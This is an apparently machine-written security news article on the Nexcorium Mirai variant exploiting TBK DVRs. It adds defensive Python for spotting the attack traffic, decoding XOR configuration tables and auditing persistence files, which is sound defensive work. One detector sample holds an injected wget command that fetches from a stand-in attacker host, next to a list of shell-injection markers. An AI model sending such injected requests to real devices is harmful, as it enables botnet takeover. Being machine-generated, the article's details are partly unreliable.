

Ethical Hacking News

Nexcorium Mirai Variant: A New Threat Emerges Through Vulnerability in TBK DVRs


A new variant of Mirai malware, dubbed Nexcorium, has been discovered to exploit a vulnerability in TBK DVR devices and launch DDoS attacks. The threat highlights the importance of regular software updates and vigilance when it comes to securing our digital assets.

  • A new variant of the Mirai malware, dubbed Nexcorium, has been discovered exploiting a vulnerability in TBK DVR devices to launch DDoS attacks.
  • The vulnerability, CVE-2024-3721, allows threat actors to gain initial access to devices and deploy malicious software.
  • Nexcorium uses XOR decoding to extract configuration data, including C2 details, attack commands, and persistence scripts.
  • The malware performs integrity checks and can replicate itself if tampering is detected.
  • Threat actors have already abused this flaw in real-world campaigns, spreading different bots and malware.



    The cybersecurity landscape is continuously evolving, and new threats emerge every day. Recently, a new variant of the Mirai malware, dubbed Nexcorium, was discovered exploiting a vulnerability in TBK DVR devices to launch distributed denial-of-service (DDoS) attacks. This threat highlights the importance of regular software updates and of vigilance in securing digital assets.

    Fortinet researchers have identified a Mirai variant, called Nexcorium, which exploits a command injection flaw in TBK DVRs to spread malware and launch DDoS attacks. The vulnerability, CVE-2024-3721, was first discovered by security professionals, who noted that it could be exploited by threat actors to gain initial access to devices and deploy malicious software.

    According to the report published by Fortinet, the threat actors exploit CVE-2024-3721 in TBK DVRs by manipulating specific request arguments to deliver a downloader script. The traffic includes a custom "X-Hacked-By" header referencing "Nexus Team," suggesting a possible attribution, although the group remains largely unknown.
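As an added example that is not part of the original article or the Fortinet report, the following Python inspects raw HTTP requests for the two traits described above: the custom X-Hacked-By header and shell metacharacters in request arguments. The endpoint, parameter names, host names and payload are constructed placeholders, not the real exploit request.

```python
# Added example, not code from the Fortinet report: a detector for the two traffic
# traits described above, run over constructed HTTP requests. The path, parameter
# names, host names and payload below are placeholders, not the real exploit.
from urllib.parse import parse_qsl, urlsplit

# Tokens that rarely belong in a DVR's query string but are typical of a shell
# injection that fetches and runs a downloader script.
SHELL_MARKERS = (";", "|", "`", "$(", "&&", "wget ", "curl ", "tftp ", "chmod ")

def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, target and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, target, _version = head[0].split(" ", 2)
    headers = {}
    for line in head[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}

def inspect_request(raw: str) -> list:
    """Return the reasons a request matches the campaign's traffic pattern."""
    req = parse_request(raw)
    reasons = []
    tag = req["headers"].get("x-hacked-by")
    if tag is not None:                       # attacker-supplied marker header
        reasons.append(f"X-Hacked-By header present: {tag}")
    query = urlsplit(req["target"]).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if any(marker in value for marker in SHELL_MARKERS):
            reasons.append(f"shell metacharacters in parameter {name!r}")
    return reasons

# Constructed requests: one ordinary status poll, one shaped like the campaign.
BENIGN_REQUEST = ("GET /cgi-bin/status?page=1 HTTP/1.1\r\n"
                  "Host: dvr.example.internal\r\n"
                  "User-Agent: Mozilla/5.0\r\n\r\n")
SUSPECT_REQUEST = ("GET /placeholder.cgi?opt=sys&cmd=1%3Bwget%20http%3A%2F%2Fc2.example.invalid%2Fdvr HTTP/1.1\r\n"
                   "Host: dvr.example.internal\r\n"
                   "X-Hacked-By: Nexus Team\r\n\r\n")

if __name__ == "__main__":
    for raw in (BENIGN_REQUEST, SUSPECT_REQUEST):
        print(parse_request(raw)["target"], "->", inspect_request(raw) or "clean")
```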

    The downloaded script, named "dvr," fetches malware samples labeled "nexuscorp" built for multiple Linux architectures such as ARM, MIPS, and x86-64, sets full execution permissions on them, and runs the payload. By shipping builds for so many architectures, Nexcorium can infect diverse devices and expand the botnet footprint.

    An analysis of one of the malware samples, "nexuscorp.x86," reveals Nexcorium, a Mirai-like malware that displays a takeover message upon execution. It uses XOR decoding to extract configuration data, including C2 details, attack commands, and persistence scripts. Like other Mirai variants, it features watchdog, scanner, and attack modules.

    Nexcorium performs integrity checks and can replicate itself if tampering is detected. Its architecture closely follows Mirai, including XOR-encoded configuration table initialization, a watchdog module, and a DDoS attack module. Upon execution, Nexcorium first XOR-decodes its embedded configuration, which includes the C2 server domain and port, persistence-related shell commands, a hard-coded brute-force wordlist, the DDoS attack commands it accepts from the C2 server, and embedded exploit code.
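The following added example (not code from the article, the Fortinet report or the Nexcorium sample) shows how an analyst recovers and decodes a Mirai-style XOR-encoded configuration table; the table layout, the single-byte key and the entries are constructed assumptions, since the page does not give the real ones.

```python
# Added example, not code from the Fortinet report or the Nexcorium sample: an
# analyst helper for Mirai-style XOR-encoded configuration tables. The layout
# (2-byte big-endian length + XOR-encoded value), key and entries are constructed.
import string

SAMPLE_KEY = bytes([0x5A])                    # constructed key, not the real one
SAMPLE_ENTRIES = ["c2.example.invalid", "1337", "/etc/inittab", "udp"]
PRINTABLE = set(string.printable)

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key; the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def build_table(entries, key: bytes) -> bytes:
    """Construct an encoded table as a sample's .data section might hold it."""
    out = b""
    for entry in entries:
        enc = xor_bytes(entry.encode(), key)
        out += len(enc).to_bytes(2, "big") + enc
    return out

def decode_table(blob: bytes, key: bytes) -> list:
    """Walk the length-prefixed entries and XOR-decode each value."""
    entries, pos = [], 0
    while pos + 2 <= len(blob):
        n = int.from_bytes(blob[pos:pos + 2], "big")
        pos += 2
        entries.append(xor_bytes(blob[pos:pos + n], key).decode("latin-1"))
        pos += n
    return entries

def recover_key(blob: bytes, crib: str) -> list:
    """Return every single-byte key under which all entries decode to printable
    text and some entry contains the crib (a string the malware is known to use,
    such as a path it touches). Useful when the key is not obvious in the binary."""
    hits = []
    for k in range(256):
        decoded = decode_table(blob, bytes([k]))
        if all(set(e) <= PRINTABLE for e in decoded) and any(crib in e for e in decoded):
            hits.append(k)
    return hits

SAMPLE_BLOB = build_table(SAMPLE_ENTRIES, SAMPLE_KEY)

if __name__ == "__main__":
    print("candidate keys:", [hex(k) for k in recover_key(SAMPLE_BLOB, "/etc/")])
    for entry in decode_table(SAMPLE_BLOB, SAMPLE_KEY):
        print("config entry:", entry)
```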

    The malware also embeds exploits such as CVE-2017-17215 targeting Huawei devices and includes a large list of default credentials to brute-force Telnet access. Once inside a system, Nexcorium verifies the device architecture, executes commands, and establishes persistence by copying itself into system directories.

    Nexcorium ensures persistence through multiple methods: it modifies /etc/inittab to restart automatically, updates /etc/rc.local for startup execution, creates a systemd service, and adds a cron job. After setup, it deletes its original binary to evade detection.
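As an added example, not code from the article or the Fortinet report, this Python audits the persistence locations listed above and flags running processes whose on-disk binary has been deleted (the trace left when the malware removes its original binary). The file contents and /proc data are constructed samples, and the list of suspect directories is an assumption a defender would tune to their fleet.

```python
# Added example, not code from the Fortinet report: audits the Linux persistence
# locations named above from text you supply. The inittab/rc.local/crontab/systemd
# snippets and /proc exe targets below are constructed, not real Nexcorium artefacts.
import re

SUSPECT_DIRS = ("/tmp/", "/var/tmp/", "/dev/", "/run/user/")  # unusual homes for a service binary

def commands_from(kind: str, text: str) -> list:
    """Extract the command strings a persistence file would run at boot."""
    cmds = []
    for line in (l.strip() for l in text.splitlines()):
        if not line or line.startswith("#"):
            continue
        if kind == "inittab":                 # id:runlevels:action:process
            parts = line.split(":", 3)
            if len(parts) == 4:
                cmds.append(parts[3])
        elif kind == "cron":                  # "@reboot cmd" or 5 time fields + cmd
            n = 1 if line.startswith("@") else 5
            fields = line.split(None, n)
            if len(fields) == n + 1:
                cmds.append(fields[n])
        elif kind == "systemd":               # ExecStart= / ExecStartPre= lines
            m = re.match(r"Exec(?:Start|StartPre)=-?(.*)", line)
            if m:
                cmds.append(m.group(1))
        else:                                 # rc.local: plain shell lines
            cmds.append(line)
    return cmds

def suspicious(cmd: str) -> bool:
    """True if any simple command (split on ; | && ||) runs from a suspect directory."""
    return any(s.split() and s.split()[0].startswith(SUSPECT_DIRS)
               for s in re.split(r"\s*(?:;|&&|\|\||\|)\s*", cmd))

def audit(files: dict, proc_exe: dict) -> list:
    """Return (source, detail) findings: risky boot commands, plus processes whose
    binary was deleted after launch (readlink /proc/<pid>/exe ends in '(deleted)')."""
    findings = [(name, cmd) for (kind, name), text in files.items()
                for cmd in commands_from(kind, text) if suspicious(cmd)]
    findings += [(f"pid {pid}", exe) for pid, exe in proc_exe.items()
                 if exe.endswith("(deleted)")]
    return findings

SAMPLE_FILES = {   # constructed contents keyed by (format, source name)
    ("inittab", "/etc/inittab"): "::sysinit:/etc/init.d/rcS\n::respawn:/tmp/.x/svc\n",
    ("rc", "/etc/rc.local"): "#!/bin/sh\n/usr/sbin/ntpd -g\n/dev/shm/.run/svc &\nexit 0\n",
    ("cron", "crontab -l"): "*/5 * * * * /usr/bin/backup.sh\n@reboot /var/tmp/svc\n",
    ("systemd", "svc.service"): "[Service]\nExecStart=/usr/bin/sshd -D\n",
}
SAMPLE_PROC_EXE = {"1234": "/usr/sbin/cron", "4321": "/tmp/.x/svc (deleted)"}
```

Running `audit(SAMPLE_FILES, SAMPLE_PROC_EXE)` flags the respawn entry, the rc.local line, the @reboot job and the deleted-binary process, while leaving the ordinary ntpd, backup and sshd entries alone.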

    The malware supports various DDoS attacks, including UDP and TCP floods, and connects to a C2 server to receive commands. It can also stop attacks or terminate itself when instructed.

    Threat actors have already abused this flaw in real-world campaigns. In the past year, it was exploited to spread different bots, including a Mirai-based strain, the ShadowV2 botnet, and a newer botnet known as RondoDox. In September 2025, CloudSEK revealed a large loader-as-a-service operation that pushed RondoDox, Mirai, and Morte malware by exploiting weak passwords and outdated vulnerabilities across routers, IoT systems, and enterprise software.

    The discovery of Nexcorium highlights the need for vigilance in securing digital assets, and in particular the importance of regular software updates, patching, and monitoring for security breaches. As the threat landscape continues to evolve, it is crucial to stay informed about emerging threats like the Nexcorium Mirai variant.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/Nexcorium-Mirai-Variant-A-New-Threat-Emerges-Through-Vulnerability-in-TBK-DVRs-ehn.shtml
  • https://securityaffairs.com/190974/malware/nexcorium-mirai-variant-exploits-tbk-dvr-flaw-to-launch-ddos-attacks.html
  • https://thehackernews.com/2026/04/mirai-variant-nexcorium-exploits-cve.html
  • https://www.fortinet.com/blog/threat-research/tracking-mirai-variant-nexcorium-a-vulnerability-driven-iot-botnet-campaign
  • https://nvd.nist.gov/vuln/detail/CVE-2017-17215
  • https://www.cvedetails.com/cve/CVE-2017-17215/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-3721
  • https://www.cvedetails.com/cve/CVE-2024-3721/
  • https://cybersecuritynews.com/new-chinese-nexus-apt-hackers-attacking-organizations/
  • https://gbhackers.com/nexus-apt-group/


  • Published: Sat Apr 18 06:38:08 2026 by llama3.2 3B Q4_K_M
